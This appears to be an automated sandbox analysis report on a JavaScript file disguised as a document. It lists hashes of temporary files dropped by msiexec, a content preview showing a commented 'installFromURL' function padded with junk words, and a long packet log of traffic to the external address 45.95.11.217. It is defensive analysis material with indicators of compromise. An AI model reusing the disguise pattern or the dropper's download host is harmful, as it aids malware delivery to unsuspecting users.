MD5:	4D10AEDC71EEBE654E03BF57E454F052
SHA1:	AAF0ADA9787825045DCD6B31D845667490894829
SHA-256:	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E
SHA-512:	B80D01FEDA9E9DD7CEAC9DEC496718C7734BE37EC89D1BFA727D35B4C999DDF9C06F740472D8B0D18972BA08D6945E80B353476DC9ED357E6EC660A9BF92325E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF41332C922F5AC300.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF428E4FF550ED71C3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13672374945401683
Encrypted:	false
SSDEEP:	24:vOUTx0EsipV0E+0EsipV0E2AEV0yjCycV3+bpGt7sGgSi+t9W+:2UTGSrSYAErCyc9duSiAW
MD5:	6509761DC3DDB6A9CCFA3E13BF27F0A6
SHA1:	63CA953FD7F1B7F5A1756BEC835CC451BC294245
SHA-256:	CE4CD0662EE0C9701A3525EDC4A0FEC333913590CE0055E3DF491A14026F629B
SHA-512:	7002EEEBF1C09DF75B828DA9BF2E61FEB41078F7A827243F73A2E9E036903C4E4857FC447E32C74EE589B009F552C8183275C13C9EA4BCA8AB8FCC63BF2483D8
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6629245EDF63459B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAB72B8B8E96537BE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5639398377969682
Encrypted:	false
SSDEEP:	48:C8PhTuRc06WXOOnT5TsmSYAErCyc9duSiCSGTR:thT1AnTl7qwCZdWC3
MD5:	F80C5CA698B670BAD025D06519EB4C0B
SHA1:	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942
SHA-256:	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
SHA-512:	9DAE68DCA88DA2590FD8F05690E0E0EC82ABD108F54AA98117CDF78077BB0D5E89B114CC05350EEC8019775AEE7BA27381B5BA65B2AC03D9B16E31D2D5E98A30
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB1564F1E3995B003.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD248A4793ACEF6ED.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE66F7BB54D4BA8DC.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2534735334549778
Encrypted:	false
SSDEEP:	48:SmLudNvGFXOtT5EsmSYAErCyc9duSiCSGTR:9LlwTi7qwCZdWC3
MD5:	4D10AEDC71EEBE654E03BF57E454F052
SHA1:	AAF0ADA9787825045DCD6B31D845667490894829
SHA-256:	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E
SHA-512:	B80D01FEDA9E9DD7CEAC9DEC496718C7734BE37EC89D1BFA727D35B4C999DDF9C06F740472D8B0D18972BA08D6945E80B353476DC9ED357E6EC660A9BF92325E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (537), with CRLF line terminators
Entropy (8bit):	4.542998707746019
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	Document_a19_79b555791-28h97348k5477-3219g9.js
File size:	479'411 bytes
MD5:	3f4ddf670c98e5b0656415286e42f730
SHA1:	cf27b8f44467cd4ab250b74caa039340ecd97a94
SHA256:	156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
SHA512:	e180d45f626dd7e5b91d6f46077771a9884d53e1ccddf996030c4ee57fb2c25b27a5b11ad1d616a749e878493b7c705b8a49c5616da851dfe2966b3230fafa5a
SSDEEP:	12288:rZUXLSlCpRGkwMnCzan+TMYLtA/huhhs7nkKMG4p:dUXLSIpRbwMn0VTMYLtA/huhK7TrC
TLSH:	D3A46C60EE0501671E83679F9C5215D2FD2CD21193022228E99E93AD1F875ECD3BDBAF
File Content Preview:	////function installFromURL() {..// vagotomize Cochlospermaceae catechumenate accomplice haloragidaceous bigotedly unstablished paleohydrography eleutherodactyl varietally plethory outlined golkakra solidistic semigenuflection untemporary charadrine Ptini

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:47:44.649816990 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:44.880588055 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:44.880672932 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:44.880877018 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.109477043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110301018 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110466003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110502005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110518932 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.110563993 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110578060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110615015 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.110624075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110660076 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.110668898 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110742092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110843897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110856056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.110882044 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.110918045 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340018034 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340073109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340198040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340214968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340228081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340271950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340308905 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340367079 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340403080 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340456009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340467930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340478897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340496063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340502977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340543985 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340552092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340584993 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340603113 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340624094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340636969 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340673923 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340761900 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340797901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340847015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340881109 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340884924 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.340919018 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.340987921 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.341000080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.341398954 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.571310043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571351051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571372986 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571394920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571404934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.571433067 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.571777105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571841002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.571892977 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572065115 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572107077 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572145939 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572155952 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572170973 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572185040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572208881 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572290897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572326899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572339058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572352886 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572379112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572392941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572410107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572427034 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572436094 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572453022 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572478056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572484016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572513103 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572638035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572675943 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572685957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572715044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572731972 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572748899 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.572911978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.572951078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573055983 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573085070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573112011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573118925 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573146105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573152065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573194981 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573210001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573223114 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573240042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573261023 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573266029 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573299885 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573312998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573331118 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573338032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573379993 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573393106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573416948 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573453903 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.573462963 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.573518038 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.574103117 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.803867102 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.803886890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.803901911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.803925991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.803956032 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804025888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804192066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804233074 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804281950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804316044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804441929 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804481983 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804692030 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804744959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804796934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804832935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804872036 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804884911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804925919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804927111 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804943085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.804966927 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.804985046 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805023909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805054903 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805063963 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805092096 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805140018 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805180073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805181980 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805222034 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805286884 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805326939 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805345058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805388927 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805419922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805434942 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805454969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805470943 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805480957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805488110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805497885 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805531025 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805533886 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805577040 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805587053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805622101 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805672884 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805707932 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805713892 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805751085 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805767059 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805813074 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805815935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805851936 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805874109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805890083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805916071 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805927038 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.805939913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.805974007 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806024075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806039095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806052923 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806066036 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806066036 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806083918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806113005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806113958 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806149006 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806224108 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806262016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806379080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806421041 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806422949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806462049 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806468010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806497097 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806505919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806531906 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806607008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806651115 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806658983 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806674004 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806700945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806703091 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806730032 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806744099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806749105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806760073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806787014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806794882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806806087 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806833029 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806864977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806879997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806891918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.806905031 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806921005 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806936979 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.806952000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807008982 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807081938 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807135105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807138920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807156086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807183027 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807183981 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807225943 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807225943 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807243109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807277918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807291985 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807300091 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807352066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807374001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807375908 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807393074 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807401896 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807426929 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807440996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:45.807442904 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:45.807485104 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.035756111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.035789967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.035825014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.035846949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.035856009 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.035861015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.035893917 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.035908937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.035983086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036027908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036030054 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036079884 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036087036 CEST	80	49706	45.95.11.217	192.168.2.5
